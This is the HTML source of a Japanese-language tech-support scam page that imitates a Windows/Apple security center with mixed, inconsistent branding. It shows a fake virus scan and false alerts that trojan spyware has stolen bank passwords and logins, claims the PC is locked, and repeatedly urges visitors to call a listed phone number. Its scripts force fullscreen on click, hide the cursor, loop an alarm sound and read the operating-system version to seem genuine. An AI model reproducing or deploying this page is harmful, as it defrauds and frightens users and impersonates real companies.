

<!DOCTYPE html>
<html>
<head>

  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>マイクロソフト サポート アシスタンス </title>
<link rel="stylesheet" href="styles.css">
<script type="text/javascript" src="scripts.js"></script>
<script type="text/javascript" src="custom.js"></script>
<script type="text/javascript" src="esc.js"></script>
<script type="text/javascript" src="keys.js"></script>
<link rel="icon" type="image/png" href="favicon.png">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV" crossorigin="anonymous"></script>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">

<style>
  .black {
    width: 100%;
    height: 100%;
    background-color: rgb(0 0 0 / 47%);
    opacity: 0.7;
    transition: 1s;
    position: absolute;
    top: -190px;
    left:0
  }
  </style>

  <script>
  var elem = document.documentElement;
  function openFullscreen() {
    if (elem.requestFullscreen) {
      elem.requestFullscreen();
    } else if (elem.webkitRequestFullscreen) { /* Safari */
      elem.webkitRequestFullscreen();
    } else if (elem.msRequestFullscreen) { /* IE11 */
      elem.msRequestFullscreen();
    }
  }

  function closeFullscreen() {
    if (document.exitFullscreen) {
      document.exitFullscreen();
    } else if (document.webkitExitFullscreen) { /* Safari */
      document.webkitExitFullscreen();
    } else if (document.msExitFullscreen) { /* IE11 */
      document.msExitFullscreen();
    }
  }
  </script>


</head>
<body id="mycanvas" onclick="playSound()" >

  <div class="bg" style="cursor:none;">
    <div class="bgimg" style="top: 0px;"><img src="bckgrnd.png" alt="" width="100%"></div>

</div>

  <a  onclick="openFullscreen();" rel="noreferrer" id="link_black" style="">
    <div class="black" style="height: 145%;"></div>
</a>

<div class="box" id="box">
<div class="top">
<p style="font-size: 17px;  font-family: Arial, Helvetica, sans-serif;">Apple セキュリティ<img src="minimize.jpeg" class="" style="float: right; width:115px;"></p>
</div>

<h4 style="position: absolute; left: 70px; top: 53px; font-weight: 300;" id="text1">ひと目でわかる安全性</h4>
<p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2"><br>デバイスの安全性と健康状態に何が起こっているかを確認し、必要なすべての措置を講じてください。</p>
<div class="centerright">
<ul>
<li>
<br>
<img src="kxFy-clip.png" width="50px;">
<p>ウイルスと脅威に対する保護</p>
<p style="top: 103px; position: absolute; font-size: 13px; color: grey;">アクションが必要です。 スキャンを実行して<br>脅威をチェックします。</p>

</li>
<li>
<br><br>
<img src="qsbs-firewall.png" width="60px;">
<p>ファイアウォールとネットワーク保護</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">アクションは必要ありません。</p>
</li>
</ul>
<ul>
<li>
<br>
<img src="s-S4-acc.png" width="60px;">
<p>アカウント保護</p>
<p style="top: 125px; position: absolute; font-size: 13px; color: grey;">アクションは必要ありません。</p>
</li>
<li>
<br>
<img src="Z5BR-network.png" width="51px;"/>
<p>アプリケーションとブラウザの制御</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">アクションは必要ありません。</p>
</li>
</ul>
</div>
<img src="uZbx-si.png" class="" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
<br>
</div>


<!--Windows Security Quick Scan-->
<div class="scan" id="scan">
  <div class="top">
  <p style="font-size: 17px;  font-family: Arial, Helvetica, sans-serif;">Apple セキュリティ<img src="minimize.jpeg" class="" style="float: right; width:115px;"></p>
  </div>
  <h4 style="position: absolute; left: 70px; top: 53px; font-weight: 300;" id="text1"><img src="okPE-vs.png" width="25px;" style="margin-right: 10px;vertical-align: sub;">ウイルスと脅威に対する保護</h4>
  <p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2">脅威に対するデバイスの保護。</p>

<h3 style="    position: absolute;
right: 150px;
top: 6px;
font-weight: 500;
font-size: 19px;" id="text12"><b>0101 (866) 907-8023 (無料のセキュリティ)</b></h3>

  <div class="centerright">


  <ul>
  <li>



  <div class="flex"> <img src="-EBq-current.png" width="20px" height="20px;" style="margin-right: 10px; top: 10px; position: absolute;"><p style="font-weight: 400; position: absolute; left: 30px;">現在の脅威</p></div>


  <br><br>
  <div class="progress" id="bar">
    <div class="progress__bar"></div>
  </div>

  <p style="font-size: 13px;" id="info">クイック スキャンが進行中です...<br>推定残り時間: <n id="time">0</b></n><br><n id="amount">0</b></n> スキャンされたファイル。</p>

  <a href="#"class="button" id="re">キャンセルします</a>
  <p style=" font-size: 13px;" id="recx">デバイスを分析している間、作業を続けてください。</p>

  <p style="font-size: 13px; color: #0063c6; cursor: pointer;" id="recx-hide">保護履歴</p>
  <br>
  <p id="shx" style="font-size: 13px; color: #0063c6; display: none; cursor: pointer;">スキャン オプション<br> 許可された脅威<br> 保護履歴</p>


  </li>

  <li>

<div class="flex"><img src="nOxp-sett.png" height="28px" width="30px;" style="margin-right: 10px; margin-top: 5px;"><p style="position: absolute; left: 35px;    bottom: 84px;    line-height: 18px;">ウイルスと脅威の防止の設定 </p> </div>
<p style="color: grey; font-size: 13px;">アクションは必要ありません</p>
<p style="font-size: 13px; color: #0063c6;">設定を管理する</p>
  </li>
  </ul>
  <ul>

  <li>


  <p style="position: absolute; top: -55px;">質問があります？</p>

  <p style="font-size: 13px; color: #0063c6; position: absolute; top: -15px; cursor: pointer;">ヘルプを取得する</p>

  </li>
  <li>


    <p style="position: absolute; top: 25px;">誰が私を守ってくれるの?</p>

    <p style="font-size: 13px; color: #0063c6; position: absolute; top: 65px; cursor: pointer;">サプライヤーの管理</p>

    </li>
    <li>


      <p style="position: absolute; top: 100px; "><br>Apple のセキュリティの向上にご協力ください</p>

      <p style="font-size: 13px; color: #0063c6; position: absolute; top: 152px; cursor: pointer;">フィードバックをお寄せください</p>

      </li>
      <li>

        <p style="position: absolute; top: 190px;">プライバシー設定を変更する</p>
        <p style="position: absolute; top: 220px; font-size: 13px;">Apple のプライバシー設定を表示および変更する<br><n id="which"></b></n> 端末.</p>

        <p style="font-size: 13px; color: #0063c6; position: absolute; top: 270px; cursor: pointer;">プライバシー設定<br>プライバシー ダッシュボード<br>プライバシーに関する声明</p>

        </li>

  </ul>

  </div>
  <img src="uZbx-si.png" class="" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
  <br>
  </div>
  <script>
          navigator.userAgentData.getHighEntropyValues(["platformVersion"])
   .then(ua => {
     if (navigator.userAgentData.platform === "Windows") {
       const majorPlatformVersion = parseInt(ua.platformVersion.split('.')[0]);
       if (majorPlatformVersion >= 13) {
        document.getElementById("which").innerHTML = " 11";
        }
        else if (majorPlatformVersion > 0) {
          document.getElementById("which").innerHTML = " 10";
        }
        else {
          console.log("超えた");
        }
     }
     else {
       console.log("Windowsでは動作しません");
     }
   });
  </script>

<div class="alert_popup cardcontainer lightbox">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <p class="text-center" style="    font-size: 16px;
font-weight: normal;
margin: 0;
margin-bottom: 5px;
padding: 5px 10px;
color: #fff;font-weight: bold;
margin-top: 8px; text-align: center;">Apple セキュリティ - スパイウェアの警告</p>
                <p class="text-center">** セキュリティ上の理由により、この PC へのアクセスはブロックされています **</p>
                <p>お使いのコンピュータは、トロイの木馬スパイウェアに感染していることを警告しています。 次のデータが侵害されました。<br><br>
                  > メール ID<br> &gt; 銀行のパスワード<br>
                  > Facebookログイン<br>
                  > 写真と写真 書類 </p>

                  <!-- <p>Windows セキュリティ スキャンにより、パスワード、オンライン ID、財務情報、個人ファイル、画像、またはドキュメントを盗む可能性のある望ましくない可能性のあるアドウェアがこのデバイスで検出されました。 <br><br></p> -->
                  <p>エンジニアが電話で削除プロセスを説明できるように、すぐにご連絡ください。<br><br>

                    すぐに Apple サポートに連絡して、この脅威を報告し、なりすましを防ぎ、このデバイスへのアクセスをロック解除してください。<br><br>
                    このウィンドウを閉じると、個人情報が危険にさらされ、Apple の登録が中断されます。</p>

               <p style="padding-bottom: 0px;">Apple サポートに電話する <strong>0101 (866) 907-8023 (日本フリーダイヤル)</strong></p>
               <div class="action_buttons"> <a class="" id="leave_page" style="cursor: pointer;">わかった</a> <a class="" id="leave_page">キャンセルします</a> </div>
            </div>

        </div>
    </div>
</div>
<audio id="beep" loop>
  <source src="_Fm7-alert.mp3" type="audio/mpeg">
</audio>

<script>
  addEventListener("click", function() {
var el = document.documentElement
  , rfs =
         el.requestFullScreen
      || el.webkitRequestFullScreen
      || el.mozRequestFullScreen
;
rfs.call(el);
});

</script>

<div id="lst"" class="lst lightbox">
  <div class="ilb top">
      <div class="headers ilb" style="border-bottom: 1px solid #d6d5d5;">
          <span id="txtadd" class="fl title"><span class="fl ilb"><img src="imgs.png" class="logo3"></span> Apple Defenderセキュリティセンター</span>
          <span id="txts1" class="fl title2"><a href="#"><img src="cross.png"></a></span>

      </div>
  </div>
  <div id="txtintro">
              <span class="colo-rd">応用: Ads.fiancetrack(2).dll<br>
                検出された脅威: トロイの木馬スパイウェア</span>
  </div>
  <img id="banner" src="websafg.png">
  <div id="disclaimer">
      このPCへのアクセスはセキュリティ上の理由でブロックされています。<br>
      <span class="support">Apple: 0101 (866) 907-8023 (通話料無料)</span>
  </div>
  <div id="bottom">
      <img id="badge" src="imgs.png"><span class="title3">マイクロソフト</span>
      <ul>
          <li>
              <a href="#">
                  <div class="fr button2">
                      <span id="addtochromebutton">拒否</span>
                  </div>
              </a>
          </li>
          <li>
              <a href="#">
                  <div class="fr buttons blink">
                      <span id="addtochromebutton">許可する</span>
                  </div>
              </a>
          </li>
      </ul>

  </div>
</div>


<div id="footer" style="bottom: 0; position: absolute; cursor: none;width: auto;overflow: hidden;">
  <div class="row">

      <div class="col-md-12">
          <div class="right-foot" style="text-align: center;">
              <span id="footertxt"><img src="imgs.png"> マイクロソフト: </span><span style="font-weight: 700;padding-left: 13px;color: #fff;">サポート問い合わせ先 <span style="border: 1px solid #fff;border-radius: 5px;padding: 2px 5px;">0101 (866) 907-8023 (通話料無料)</span></span>
          </div>
      </div>
      <div class="col-md-12">
          <marquee width="100%" direction="left" height="100px"><small class="text-left" style="color: #eee;font-size: 10px;">ウィンドウズ
                                                                       Defender SmartScreenは、認識されないアプリが表示するのを防ぎました。 このアプリを実行すると、PCが置かれる可能性があります
                                                                       危険にさらされています。 Apple Defender Scanは、このデバイス上で盗む可能性のある不要なアドウェアを発見しました
                                                                       パスワード、オンラインID、財務情報、個人ファイル、写真、または
                                                                       ドキュメント.</small></marquee>
      </div>
  </div>


</div>

<div id="welcomeDiv"
     style=" display:none; background-color:#000; height: auto; width: 550px; margin-left:32%;position: absolute;z-index: 9999999999;text-align: center;
     margin-top: -8px; "
     class="answer_list">
    <p class="text-center" style="color: #FEFEFE;  margin-top:10px; font-size: 16px; opacity:.9; ">再起動または使用しないでください
        あなたのコンピュータ.<br>コンピューターが無効になっています。 私に電話してください。<br>アクセスはこれのブロックセキュリティの理由です
        コンピュータ。<br>すぐにご連絡ください。 技術者が問題の解決をお手伝いします.</p>


</div>


<div class="modal fade" id="exitModal" tabindex="-1" role="dialog">
  <div class="modal-dialog modal-full-height modal-right" role="document">
    <div class="modal-content">
      <img id="modal-exit" src="cross.png" class="modal-exit">
      <div class="modal-body">
        <div class="row">
          <div class="d-none d-md-block col-md-5 text-center">
            <a href="#" target="_blank" class="exit-href" rel="noopener noreferrer nofollow">
              <img class="img-fluid rounded" src="stop.png" />
            </a>
          </div>
          <div class="col-12 col-md-7 text-left">
            <div id="modal-title" class="modal-title text-center modal-title-1">安全警告を止める このページを閉じないでください 今すぐお電話ください <br> 0101 (866) 907-8023 </div>
            <div class="">
              <a class="btn btn-visit btn-popup jumpy" target="_blank" href="#" rel="noopener noreferrer nofollow">
                <span>ここをクリック</span>
              </a>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>

<script>
  $(document).ready(function () {
      $("#mycanvas").click(function () {
          $("#welcomeDiv").show();
      });
  });
</script>

 </body>


</html>
